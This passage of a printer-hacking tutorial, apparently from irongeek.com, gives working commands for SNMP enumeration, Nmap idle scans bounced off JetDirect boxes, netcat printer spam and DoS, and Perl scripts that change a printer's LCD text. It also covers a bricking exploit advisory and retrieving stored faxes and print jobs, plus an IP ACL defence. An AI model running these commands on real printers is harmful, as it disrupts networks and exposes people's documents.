Try combining the above with the Google "site:" parameter to restrict the search to just certain organizations.
For more information on Google Hacking visit http://johnny.ihackstuff.com and search their database of useful
Google search strings for "Printers". I obtained some of the above search strings from Johnny's site.
Finding info about the printer using SMP tools
Using the tools from http://net-snmp.sourceforge.net on a Linux box can yield a great deal of information about
a network, assuming no firewalls are blocking the SNMP port (161/udp). The greatly truncated output below should
give you some idea as to the kind of information you can get using snmpwalk, including other hosts on the same
network, their IPs and MAC addresses and the features of the printer along with it's firmware revision. If you are
using a Debian based distribution on Linux try the "apt-get install snmp" command to get these tools.
root@Cthulhu:~# snmpwalk -v 1 -c public 192.168.1.2
SNMPv2-MIB::sysDescr.0 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.11.2.3.9.1
SNMPv2-MIB::sysUpTime.0 = Timeticks: (1358074910) 157 days, 4:25:49.10
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
15 of 37 02/04/2009 08:17
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: NPI6D47C6
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 64
IF-MIB::ifNumber.0 = INTEGER: 1
IF-MIB::ifIndex.1 = INTEGER: 1
IF-MIB::ifDescr.1 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49
IF-MIB::ifType.1 = INTEGER: ethernetCsmacd(6)
...Omitted for security and space reasons...
IF-MIB::ifOutQLen.1 = Gauge32: 0
IF-MIB::ifSpecific.1 = OID: SNMPv2-SMI::zeroDotZero.0
RFC1213-MIB::atIfIndex.1.1.192.168.19.16 = INTEGER: 1
...Omitted for security and space reasons...
RFC1213-MIB::atIfIndex.1.1.192.168.31.254 = INTEGER: 1
RFC1213-MIB::atIfIndex.1.1.24.0.1.60 = INTEGER: 1
RFC1213-MIB::atPhysAddress.1.1.192.168.19.16 = Hex-STRING: 00 0A 95 A6 6C 00
...Omitted for security and space reasons...
RFC1213-MIB::atPhysAddress.1.1.192.168.31.254 = Hex-STRING: 00 0F 34 E8 DC 38
RFC1213-MIB::atPhysAddress.1.1.24.0.1.60 = Hex-STRING: 01 00 5E 00 01 3C
RFC1213-MIB::atNetAddress.1.1.192.168.19.16 = Network Address: 95:A0:13:10
...Omitted for security and space reasons...
RFC1213-MIB::atNetAddress.1.1.192.168.31.254 = Network Address: 95:A0:1F:FE
RFC1213-MIB::atNetAddress.1.1.24.0.1.60 = Network Address: E0:00:01:3C
IP-MIB::ipForwarding.0 = INTEGER: notForwarding(2)
I...Omitted for security and space reasons...
IP-MIB::ipAdEntAddr.192.168.1.2 = IpAddress: 192.168.1.2
...Omitted for security and space reasons...
IP-MIB::ipNetToMediaIfIndex.1.192.168.19.16 = INTEGER: 1
I...Omitted for security and space reasons...
IP-MIB::ipNetToMediaIfIndex.1.192.168.31.254 = INTEGER: 1
IP-MIB::ipNetToMediaIfIndex.1.24.0.1.60 = INTEGER: 1
IP-MIB::ipNetToMediaPhysAddress.1.192.168.19.16 = STRING: 0:a:95:a6:6c:0
...Omitted for security and space reasons...
IP-MIB::ipNetToMediaPhysAddress.1.192.168.31.254 = STRING: 0:f:34:e8:dc:38
...Omitted for security and space reasons...
IP-MIB::ipNetToMediaNetAddress.1.192.168.31.254 = IpAddress: 192.168.31.254
...Omitted for security and space reasons...
IP-MIB::ipNetToMediaType.1.192.168.31.254 = INTEGER: dynamic(3)
IP-MIB::ipNetToMediaType.1.24.0.1.60 = INTEGER: dynamic(3)
IP-MIB::ipRoutingDiscards.0 = Counter32: 2801
...Omitted for security and space reasons...
IP-MIB::icmpOutAddrMaskReps.0 = Counter32: 0
TCP-MIB::tcpRtoAlgorithm.0 = INTEGER: vanj(4)
TCP-MIB::tcpRtoMin.0 = INTEGER: 10 milliseconds
TCP-MIB::tcpRtoMax.0 = INTEGER: 120000 milliseconds
...Omitted for security and space reasons...
TCP-MIB::tcpRetransSegs.0 = Counter32: 20
TCP-MIB::tcpConnState.192.168.1.2.21.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnLocalAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress: 192.168.1.2
TCP-MIB::tcpConnLocalPort.192.168.1.2.21.0.0.0.0.0 = INTEGER: 21
TCP-MIB::tcpConnRemAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress: 0.0.0.0
TCP-MIB::tcpConnRemPort.192.168.1.2.21.0.0.0.0.0 = INTEGER: 0
TCP-MIB::tcpInErrs.0 = Counter32: 0
TCP-MIB::tcpOutRsts.0 = Counter32: 17832
UDP-MIB::udpInDatagrams.0 = Counter32: 8374653
UDP-MIB::udpNoPorts.0 = Counter32: 8135924
UDP-MIB::udpInErrors.0 = Counter32: 22054
UDP-MIB::udpOutDatagrams.0 = Counter32: 363574
UDP-MIB::udpLocalAddress.0.0.0.0.68 = IpAddress: 0.0.0.0
UDP-MIB::udpLocalPort.0.0.0.0.68 = INTEGER: 68
UDP-MIB::udpLocalAddress.192.168.1.2.137 = IpAddress: 192.168.1.2
The above command works well on Jetdirects, Richo Savins and other common network printers that support
SNMP. If you don't know the proper SNMP community name a quick sniff of the network with Ettercap or Dsniff
should revel it to you iif the admin is using using SNMP version 1 or 2. Most times the community name will just be
the default "public".
Using a JetDirect box as an map Idlescan Zombie
While I'm on the topic of Nmap and JetDirect boxes, they make great bouncers for stealth Idle scans (also know
as Zombie scans) since their IPIDs are incremental. Basically what happen is the Nmap scan is bounced off of the
JetDirect box and any logs on the target will show the IP of the JetDirect box as being the attacker. There are a few
problems with these kinds of scans, the biggest being that they are VERY slow. For more details on Idle scans see
the following URL:
http://www.insecure.org/nmap/idlescan.html
and the Nmap MAN page:
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
16 of 37 02/04/2009 08:17
-sI <zombie host[:probeport]>Idlescan: This advanced scan method allows for a truly blind TCP port scan ofthe target (meaning no packets are sent to the target from your real IPaddress). Instead, a unique side-channel attack exploits predictable "IP frag-mentation ID" sequence generation on the zombie host to glean information aboutthe open ports on the target. IDS systems will display the scan as coming fromthe zombie machine you specify (which must be up and meet certain criteria). Iwrote an informal paper about this technique at http://www.inse-cure.org/nmap/idlescan.html .
Besides being extraordinarily stealthy (due to its blind nature), this scantype permits mapping out IP-based trust relationships between machines. Theport listing shows open ports from the perspective of the zombie host. So youcan try scanning a target using various zombies that you think might be trusted(via router/packet filter rules). Obviously this is crucial information whenprioritizing attack targets. Otherwise, you penetration testers might have toexpend considerable resources "owning" an intermediate system, only to find outthat its IP isn't even trusted by the target host/network you are ultimatelyafter.
You can add a colon followed by a port number if you wish to probe a particularport on the zombie host for IPID changes. Otherwise Nmap will use the port ituses by default for "tcp pings".
Here is an example of Nmap being run using a JetDirect box as a bouncer. I've used the -P0 option so that the
host running Nmap does not ping the target first, lessening the stealth value by giving away the scanners true IP.
Irongeek:~# nmap -P0 -sI 192.168.1.93 Irongeek.irongeek.com
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 17:22 EDTIdlescan using zombie 192.168.1.93 (192.168.1.93:80); Class: IncrementalInteresting ports on 192.168.1.5:(The 1654 ports scanned but not shown below are in state: closed|filtered)PORT STATE SERVICE22/tcp open ssh25/tcp open smtp80/tcp open http110/tcp open pop3111/tcp open rpcbind139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds587/tcp open submission
Nmap finished: 1 IP address (1 host up) scanned in 35.262 secondsIrongeek:~#
Now, if 192.168.1.5 looks at its logs it will appear that 192.168.1.93 (the JetDirect box) was doing the scan.
Sneaky!
Setting up a direct IP printer in Windows and Linux
Setting up a direct IP printer can be useful from time to time; here are a few reasons why you might want to set
up one up:
1. Your main print server is unreliable.
2. Sometimes cutting out the middle man make a print job work when normally it would not. Some PDFs used to give
me fits when I used a Window 2000 server to host print shares, but printing directly to the IP printer worked like a
charm.
3. To bypass access rights to a printer or to get around print tracking software like Pharos Uniprint or Equitrac.
Rather then waste space on how to set up direct IP printing in Windows I'll point you to Microsoft's howto:
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
17 of 37 02/04/2009 08:17
library/ServerHelp/25468cbe-faab-424c-aae5-ddd333436c0d.mspx
and HP's:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj06391
If you wish to script the installation in Windows check out:
https://engineering.purdue.edu/ECN/Resources/KnowledgeBase/Docs/20040216090320
For you Linux users it's pretty easy to set up a direct IP printer too. Make sure you have CUPS (Common Unix
Printing System) installed (for us Debian folks: apt-get install cupsys). Most Linux distributions have a GUI setup
wizard now, but you can also add a direct IP printer from the shell by using a command like the following:
foomatic-configure -s cups -n My-Remote-JetDirect -c socket://192.168.1.2:9100/
Of course, you will want to change the IP and maybe the name to reflect your network and printer setup. If for
some reason
http://192.168.4.2:631/printer
http://192.168.4.2:631/ipp
Spamming Printers
I'm rather surprised with the amount of E-mail, Net Message and Fax spam that know one seems to have tried
Printer Spam. First, the attacker would need to have something to iterate though printers. I wrote a quick tool for
Linux and Windows call IPIterator that does just this:
http://www.irongeek.com/i.php?page=security/ipiterator
The following example assumes that port 9100/tcp is open past the firewall (don't laugh, I've seen it), but with some
motification I'm pretty sure it could be made to work with IPP and FTP enabled printers too. All one has to do is
generate a PostScript or PCL file with the content they want to send it the spam message. The Windows "Printer to
File" option works well for this. In a pinch a plain old text file will also work. Then they can use Netcat and IPIterator
to send the print job to a whole IP range of printers.
Irongeek@Irongeek:~# ./ipiterator 192.168.3.1-5,25,"cat spam.prn|netcat -q 0 ~ip 9100"cat spam.prn|netcat -q 0 192.168.3.1 9100Starting thread 1cat spam.prn|netcat -q 0 192.168.3.2 9100Starting thread 2cat spam.prn|netcat -q 0 192.168.3.3 9100Starting thread 3cat spam.prn|netcat -q 0 192.168.3.4 9100Starting thread 4cat spam.prn|netcat -q 0 192.168.3.5 9100Starting thread 5DONEIrongeek@Irongeek:~#
Evil I know, maybe I should not have mentioned it as now it may become more common. This facility might also be
legitimately useful for sending out mass messages on a network where your work.
Side note on a Pharos Uniprint vulnerability
While this is not directly related to the article's main topic I thought that some of you would be interested in
knowing about a vulnerability with the Pharos Uniprint system. It looks like Pharos Uniprint saves the last print jobs
sent to a printer into C:\Program Files\Pharos\Temp\PORT*.PRN as a simple PCL print job which is readable by
everyone on the Windows box by default. With a quick NetCat command (seen later in this article in the sniffing and
replay section) or an FTP of the file to a JetDirect box it's easy to see what others have been printing out on that
Windows workstation. Not very secure huh? It seems that Pharos did fix this in later versions, as Edward Burhenn
stated in his email to me:
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
18 of 37 02/04/2009 08:17
This was a "bug" in an older version of Pharos for which
a hot fix was released:
The application of Pharos 7.0 Hot Fix 1 ensures that no
more spool file copies will be retained after print jobs for
both Popups and non-Popups printers. Existing copies of
old spool files in the ...\Pharos\Temp folder will need to
be deleted manually.
To avoid any further confusion could you post an update
to the article, perhaps directing folk to the hot fix which
can be downloaded from our website:
http://www.pharos.com/Support/index.html?
Thanks,
Ed
Edward Burhenn
Technical Specialist
DoSing the network or the printer
As should be obvious by now for those that have been paying attention, it's pretty trivial to cause a DoS (Denial
of Service) attack with a JetDirect box that's not password protected. A deviant user could just use the telnet or web
interface to set the IP of the JetDirect to the same IP as the gateway - instant routing confusion. Another option for
network mayhem would be to set the host name of the JetDirect box to that of another box on the network. This
would mess a few things up if the facility uses dynamic DNS for host names. Also notice form the UDP port scan
show earlier that the JetDirect box is running the NetBIOS naming service, so changing the host name on a Windows
network could cause name resolution problems.
As for DoSing the printer, if someone wanted to be a dick they could just hop onto their *nix box and cat their
hard drive to the printer, causing a print job the size of the local hard drive:
cat /dev/hda|netcat -q 0 192.168.1.2 9100
Much the same thing could be accomplished by FTPing your swap file to a JetDirect box that accepts FTP print
jobs.
Another thing that could be done is to upload a corrupted firmware to the JetDirect box. This can be done by
obtaining the HP Download Manager from:
http://www.hp.com/go/dlm_sw
and then attempting an upgrade of the firmware, but stopping the process halfway though. The JetDirect will be non
responsive until a full firmware is uploaded again. An interesting side note, you can upgrade the firmware on a
JetDirect even if you don't know the JetDirect's system password. Why HP did not require a password for a firmware
update I have no idea; it just seems like common sense that they would. From reading Slobotron's article (linked at
the bottom) it would seem you can also upgrade the firmware with Netcat.
On a lark I decided to test out the effects of connect to port 9100/tcp and holding the connection using the Telnet
command. I tested it on a Ricoh Savin Aficio 2045e and a JetDirect 300x (J3263A) and the result was that the
connection to port 9100/tcp seems to be single threaded. While I held the Telnet connection to port 9100 no other
print jobs could be sent to the printer! The connection should timeout after awhile. Imagine if someone used an active
connection on the LAN and a command like:
./ipiterator 192.168.1.*,25,"telnet ~ip 9100"
to knock out printing to a whole LAN! See the section above for more info on IPIterator.
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
19 of 37 02/04/2009 08:17
Because of the relatively weak IP stacks in most network printers there are a lot of other little Denial of Service
exploits. I recommend checking out http://www.securityfocus.com/bid/ for more DoS attacks. One of the more
interesting attacks to be found recently (12/19/2006)comes form researcher Joxean Koret. I've got to thank the
Pauldotcom pod cast (episode 55) for pointing it out to me. It seems that Mr. Koret found a flaw in some HP
Jetdirect's that permanently bricks the printer server to the point it has to be sent back to HP to be fixed. For those
that don't understand the term "brick" it means that the device has be made inoperatable because of a bad firmware
or an electrical problem. This is a serious flaw since it effectively turns the JetDirect into a paperweight. In Joxean
Koret's words:
HP FTP Printer Server Denial Of Service
---------------------------------------
Author: Joxean Koret
Date: 2006
Location: Basque Country
Affected Software
-----------------
Vendor: Hewlett Packard
Description: HP Printers FTP Server Denial Of Service
Description
-----------
A problem exists in almost any currently used HP Printer with the FTP
Print Server.
Version 2.4 of the FTP Print Server will crash with only one shoot.
Version 2.4.5, which is latest, will need various shoots (the number of
shoots needed is currently unknow).
While playing with my own FTP Fuzzer I tried finding flaws in HP's
Printers. After trying with 5 printers I found the problem in all of
these. The problem is a buffer overflow in the LIST and NLST command. In
version 2.4 a single shoot sending a LIST command with a long string
(about 256 characters) is sufficient enough to test the vulnerability.
Take care trying it because two of my printers were crashed completely
(you will need to make use of your warranty ;] ). Against 2.4 versions
it can crash the complete printer and be unresponsive even after
rebooting it.
In version 2.4.5 (which is the latest) you need to send various times
long shoots to the parameter LIST (a single shoot will not crash,
printer will answer with a "Path too long" message). You will need to
send various times a LIST command with long strings. When trying with
other commands you will see that no problem is raised and the printer
will always be responsive. After a successfull attack you may completely
crash your printer (i.e., calling technical support to fix your crashed
printer).
The problem can be easily triggered by using any FTP fuzzing tool. You
can crash your printer in about 10 second(s) in a LAN.
The printer models I used in my tests are:
* HP LaserJet 5000 Series (firmware R.25.15 / R.25.47)
* HP LaserJet 5100 Series (firmware V.29.12)
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
20 of 37 02/04/2009 08:17
Attached goes POCs for the vulnerabilities.
Workaround
----------
Disable the FTP print server as, surely, you aren't using it.
Disclaimer
----------
The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
Contact
-------
Joxean Koret < joxeankoret [at] yah00 [D0T] es >
--
-----------------------------------
Agian, agian, egun batez
jeikiko dira egiazko Ziberotarrak,
egiazko euskaldunak,
tirano arrotzen hiltzeko
eta gure aiten aitek utzi daikien
lurraren populiari erremetitzeko.
-----------------------------------
It is not yet know which JetDirect print servers are effected by this exploit as few people want to take the
chance of destroying their own. I've mirrored his two proof of concept scripts if anyone would like to test them and
let me know which JetDirects it works on:
jd-dos2.4.5.py
jd-dos2.4.py
MITRE lists this bug as CVE-2006-6742. The buffer overflow in the LIST an NLST commands seem to
overwrite part of the firmware so my best guess is that cheaper print servers without flash memory like the 170x are
probably safe. From what I'm hearing HP is not taking this threat as seriously as they should given that someone
could cripple printing for days at a corporation using this exploit and a tool like IPIterator. The only know fix as of
yet is a preventative one, and that is to turn off the JetDirect's FTP service or to block port 21/TCP at the border of
the network the print server is on. If anyone has more information on this flaw please email me. See:
http://www.security.nnov.ru/Gnews955.html for more info on this vulnerability.
By the way, don't be the kind of person that would use one of the above techniques, I only mention them so that
admins know what they need to guard against.
Update 01/20/2007: Looks like HP may have fixed this issue with a newer firmware:
http://www.securitytracker.com/alerts/2007/Jan/1017532.html
Still, if anyone has more information please email me.
Changing the LCD display text using HPhack, IGhphack or Hijetter
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
21 of 37 02/04/2009 08:17
This is an old hack (1997) and does not accomplish much,
but it is fun! Silicosis of L0pht ([email protected]) wrote the original
exploit code for *nix systems and someone else ported it to
NT/2000/XP based systems. Although it's been out there for a long
time, it still works on every HP printer/JetDirect box I have seen.
What the HP display hack allows you to do is set the text that
displays on the little LCD panel of an HP printer. It accomplishes
this over the network by sending packets to a JetDirect box hooked
to the printer (or built into it).
The first thing you need to do is find out the IP or hostname
of the JetDirect box that services the printer. You can do this in
one of at least three ways. The first way is by hitting the little test
button on the JetDirect box that's connected to the printer. If the JetDirect card is built in you may have to go through
the menus and choose "Print Configuration". Another way is to go into your "Printers and Faxs" settings, right click
and bring up the properties of the printer in question, and look under the Ports tab for the hostname (npi******).
Once you have this information it's easy to run Silicosis ' little hack.
To run it from Windows just use the following syntax: hpnt Hostname Message
Windows Example:
C:\>hpnt npi769e71 "Irongeek"HP Display hack -- [email protected]: npi769e71Message: IrongeekConnecting....Sent 54 bytes
C:\>hpnt 192.168.1.14 "Irongeek Also"HP Display hack -- [email protected]: 192.168.1.14Message: Irongeek AlsoConnecting....Sent 59 bytes
C:\>
If you want to run it from Linux download the source code at the bottom of this section and compile it using gcc.
The syntax is the same as the Windows version. Below is an example of how to compile and run it:
[root@balrog root]# gcc -o hphack hp.chp.c:28:12: warning: multi-line string literals are deprecated[root@balrog root]# ./hphack 192.168.1.14 "Irongeek"HP Display hack -- [email protected]: 192.168.1.14Message: IrongeekConnecting....Sent 54 bytes[root@balrog root]#
A few ideas for messages: "Hey Baby", "X was Here", "I see You", "Redrum", "Kill". Enjoy. If you like you can
download Silicosis hack from one of these links:
Unix Source
Windows Source
Windows Binary
I'm working on my own GUI version with
extra features; its web page can be found here:
http://www.irongeek.com
/i.php?page=security/jetdirecthack
Unfortunately it's pretty buggy.
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
22 of 37 02/04/2009 08:17
The easiest tool to use may be Hijetter by
FtR of Phenoelit, which is covered in the next
section.
Phenoelit's Hijetter and PFT
Hijetter seems to be the Swiss army knife of HP JetDirect hacking. It can control a JetDirect box with PJL
commands, and works even if a password is set (at least on my HP JetDirect 300X).You can download the binary
and the source code for this app from:
http://www.phenoelit.de/hp/download.html
Below is a screen show of Hijetter 's interface. To use Hijetter just type in the IP or host name of your JetDirect
box and click the connect icon.
You should notice that a few of the icons at the bottom of the interface light up.
You can only use the icons that are lit up. The first icon, from left to right, lets you control the file system on the
JetDirect (if it has one), the next icon lets you make changes to the settings and the last icon lets you set the text that
displace on the LCD screen. I'll cover these tasks in reverse order since I'm contrary like that.
Setting the LCD Display with Hijetter
1. After you have connected to the
JetDirect box click the LCD Display
icon.
2. Type in the message you want the
printers LCD to display.
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
23 of 37 02/04/2009 08:17
3. If you check the "Failure" radio
button the printer will stop printing
until someone hits the ok/continue
/online button on the printer, or it's
reset.
4. Click the confirm button
and your message should
now appear on the printers LCD.
Changing settings with Hijetter
1. After you have connected to the JetDirect box click
the settings icon.
2. Find the environmental variable you want to change
and type in the value you want to set it to, keeping in
mind the limitations listed in the "Info" panel.
3. Use the assign button to set your
change. An M should appear next to the variable you
changed.
4. Click the confirm button and you're
done.
Using Hijetter to treat some JetDirect boxes as files/web servers
1. After you have connected to the JetDirect box click
the File System icon.
2. Use the arrows to transfer files to and from your
client to the JetDirect box. Keep in mind that you can
only transfer one file at a time with Hijetter.
3. The New Folder and Delete icons can be used
for their obvious functions.
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
24 of 37 02/04/2009 08:17
4. Click the confirm button and you're
done.
Finding stored faxes and print jobs on Jetdirect printers
Look around the file system and download any files that looks interesting. Most of them don't have obvious file
extensions so open them up in a text editor and look at the headers to try and figure out what they are. Here are a few
of the things I've found by searching around this way:
Location What I've found
/saveDevice/DigitalSend/jobs
Jpegs with names like DS000848.005 that seem to be either print jobs or Faxes .
/FaxOut Tif files from sent Faxes
/FaxInPCL files from received Faxes. See my NetCat and FTP tricks later for moreinformation on how to print them.
/Fax/act.logSeems to be a log of phone numbers where things have be faxed to or from.Could be useful for social engineering.
Also notice that the Hewlett-Packard LaserJet 4100 MFP we connected to has a 20Gig hard drive, which makes
for a great place to hide and serve large files. I've noticed on the MFP a file can be uploaded to:
/webserver/home/
and can be accessed from the printers web interface at:
http://192.168.1.4/hp/device/
For example, if you used Hijetter to upload "naughtylinuxgirls.avi" to "/webserver/home/" it can be accessed
from the web with the URL:
http://192.168.1.4/hp/device/naughtylinuxgirls.avi
Feel free to put your homepage on a printer. :)
If you're a *nix or Window command line boy, don't despair. The same folks from Phenoelit have provided PFT,
a command line utility that can do many of the same things as Hijetter. It can be downloaded and installed with these
commands:
mkdir pjllibcd pjllibwget http://www.phenoelit.de/hp/libPJL-1.3-src.tgztar -xzf libPJL-1.3-src.tgzmakecd pft/make
Here is an example of what it looks like on the command line after you bring up the help page; look at all of the
options:
Irongeek:/home/adrian/pjllib/pft# ./pftPFT - PJL file transfer
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
25 of 37 02/04/2009 08:17
FX of Phenoelit <[email protected]>Version 0.7 ($Revision: 1.8 $)
pft> helphelp <command>quitserver [hostname]port [port number]connectcloseenv {read|print|show|set|options|changed|commit|unprotect|bruteforce}message "Display Msg"failure "Failure Msg"volumeschvol [vol:]pwdlscd [directory]mkdir [directory]rm [file]get [file]put [local file]append [local file] [file]lpwdlcd [directory]sessiontimeout [timeout]pausepft>
PFT also has some limited scripting ability by piping in commands from a text file as this example shows:
Irongeek:/home/adrian/pjllib/pft# catmypftscript.txtserver 192.168.31.213connectlsquitIrongeek:/home/adrian/pjllib/pft# ./pft<mypftscript.txtPFT - PJL file transferFX of Phenoelit <[email protected]>Version 0.7 ($Revision: 1.8 $)
pft> Server set to 192.168.31.213pft> Connected to 192.168.31.213:9100Device: HP LaserJet 4100 MFPpft> 0:\. - d.. - dPermStore - dPostScript - dPJL - dsaveDevice - dcpbLog 5227 -Fax - dsolution - dwebServer - dFaxOut - dFaxIn - dpft>Irongeek:/home/adrian/pjllib/pft#
Since Phenoelit provides the source code it could be an interesting project to write new automated tools for
extracting information from remote JetDirect boxes.
Using IP ACLs to restrict access
One of the few way that HP gives you to lock down a printer is IP ACLs (Access Control Lists). Other network
printer manufactures offer similar functionality. While the syntax may differ a little form JetDirect to JetDirect the
basics are the same. On newer JetDirects you can use the web interface to restrict what IPs can connect to the printer
(normally you just want the CUPS or Windows print server to connect) but on most all of them you can use the
Telnet interface to restrict what IPs can connect. This log should give you an idea of how the "acl allow: ip"
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
26 of 37 02/04/2009 08:17
command is used:
Irongeek@Irongeek:~# telnet 192.168.1.22Trying 192.168.1.22...Connected to 192.168.1.22.Escape character is '^]'.
HP JetDirect
Password:pass
You are logged in
Please type "?" for HELP, or "/" for current settings> allow:0> quit
===JetDirect Parameters Configured===
IP Address : 192.168.1.22Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : buttHost Name : NPI6D47B6Default Get Cmnty : Disabled
DHCP Config : DisabledPasswd : EnabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : EnabledUser QuittingConnection closed by foreign host.Irongeek@Irongeek:~# telnet 192.168.33.22Trying 192.168.33.22...Connected to 192.168.33.22.Escape character is '^]'.
HP JetDirect
Password:pass
You are logged in
Please type "?" for HELP, or "/" for current settings> allow:192.168.19.56> allow:192.168.20.0 255.255.255.0> allow:listAccess Control List:IP: 192.168.19.56 Mask: 255.255.255.255IP: 192.168.20.0 Mask: 255.255.255.0> quit
===JetDirect Parameters Configured===
IP Address : 192.168.33.22Subnet Mask : 255.255.255.0Default Gateway : 192.168.1.1Syslog Server : Not SpecifiedIdle Timeout : 90 SecondsSet Cmnty Name : buttHost Name : NPI6D47B6Default Get Cmnty : Disabled
DHCP Config : DisabledPasswd : EnabledIPX/SPX : EnabledDLC/LLC : EnabledEthertalk : EnabledBanner page : EnabledUser QuittingConnection closed by foreign host.
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
27 of 37 02/04/2009 08:17
Irongeek@Irongeek:~#
Notice that if we now try to attach or port scan the JetDirect from an unauthorized host no connections can be
made to any of the ports:
root@ScanBox:~# nmap -A 192.168.1.22
Starting Nmap 4.00 ( http://www.insecure.org/nmap/ ) at 2006-03-16 21:30 ESTWarning: OS detection will be MUCH less reliable because we did not find at least 1 open and 1 closed TCPportAll 1672 scanned ports on 192.168.1.22 are: closedMAC Address: 00:60:B0:6D:47:B6 (Hewlett-packard CO.)Device type: general purpose|VoIP phone|broadband router|printer|printserver|scanner|specialized|telecom-miscRunning: Alpha Micro AMOS, Clipcomm embedded, D-Link embedded, DEC TOPS-20, HP embedded, Liebertembedded, Nortel embedded, SMC embeddedToo many fingerprints match this host to give specific OS details
Nmap finished: 1 IP address (1 host up) scanned in 16.921 secondsroot@ScanBox:~#
It's generally a good idea to set up this kind of IP restriction as it can stop some forms of attack (though not
sniffing of print jobs using ARP poisoning).
Don't forget to look for Stored Documents via the web interface
I'm mostly putting this here because of the Ricoh Savins I've played with, but it's good advice for HP printers
too. Look for Stored Documents via the web interface on the printers you find; many times users will save print jobs
and faxes where the can be accessed from the web without even realizing it. I've found quite a few things this way in
the past while performing audits.
Coding your own scripts with PHP, Perl and PJL
I thought some of you might be interested in writing you own scripts to change the printer display, or other tasks
evolving PJL. First, read some of the PJL references linked in the reference section, then play around with telneting
in an issuing the PJL commands directly. You will notice that there are quite a few that can be used to query the
status of the printer:
Irongeek:~# telnet 192.168.1.33 9100
Trying 192.168.1.33...
Connected to 192.168.1.33.
Escape character is '^]'.
@PJL INFO ID
@PJL INFO ID
"LASERJET 4000"
@PJL INFO STATUS
@PJL INFO STATUS
CODE=10001
DISPLAY="Ready"
ONLINE=TRUE
@PJL INFO PAGECOUNT
@PJL INFO PAGECOUNT
536225
@PJL INFO MEMORY
@PJL INFO MEMORY
TOTAL=2526160
LARGEST=1204208
]̂
telnet> quit
Connection closed.
Irongeek:~#
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
28 of 37 02/04/2009 08:17
I decided to use Perl for my examples since its easy to use, multiplatform and pretty easy to do Sockets with. Most
*nix systems should have Perl already, if you use Windows download and install Activestate's ActivePerl from here:
http://www.activestate.com/Products/ActivePerl/
Another useful resource is the "Printer Job Language Technical Reference Manual" which can be found at:
http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf
read it and learn what can be done with PJL. Here are two links that may help you understand Perl and Socket
programming:
http://www.perlfect.com/articles/sockets.shtml
http://www.rocketaware.com/perl/perlipc/TCP_Clients_with_IO_Socket.htm
Here are a few quick Perl scripts. This first one just lets you set the LCD display on a JetDirect enabled HP
Printer:
#!/usr/bin/perl -w#File name: lcd.pjl.pl#From http://www.Irongeek.com [email protected]#Script to set LCD Display an HP JetDirect printer#Syntax: ./lcd.pjl.pl <ip-of-jetdirect> "Some Message"use IO::Socket;$ip = $ARGV[0];$lcdtext = $ARGV[1];my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => '9100', Proto => 'tcp', );die "Could not create socket, Monkey boy! $!\n" unless $sock;print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"$lcdtext\"\n";print $sock "\e%-12345X\n";close($sock);
Sometimes the above version does not work, so try:
#!/usr/bin/perl -w#File name: lcd.pjl.pl#From http://www.Irongeek.com [email protected]#Script to set LCD Display an HP JetDirect printer#Syntax: ./lcd.pjl.pl <ip-of-jetdirect> "Some Message"use IO::Socket;$ip = $ARGV[0];$lcdtext = $ARGV[1];my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => '9100', Proto => 'tcp', );die "Could not create socket, Monkey boy! $!\n" unless $sock;print $sock "\@PJL RDYMSG DISPLAY = \"$lcdtext\"\n";close($sock);
It would seem that sometimes the escape character (27 dec, 1B hex, 033 oct) and "%-12345X" is needed and
sometimes it's not. It appears from my reading that it's only needed for UEL (Universal Exit Language) commands. I'd
like more details on when it has to be used and when it does not, email me if you know.
This script just sends a simple line of text to the printer directly:
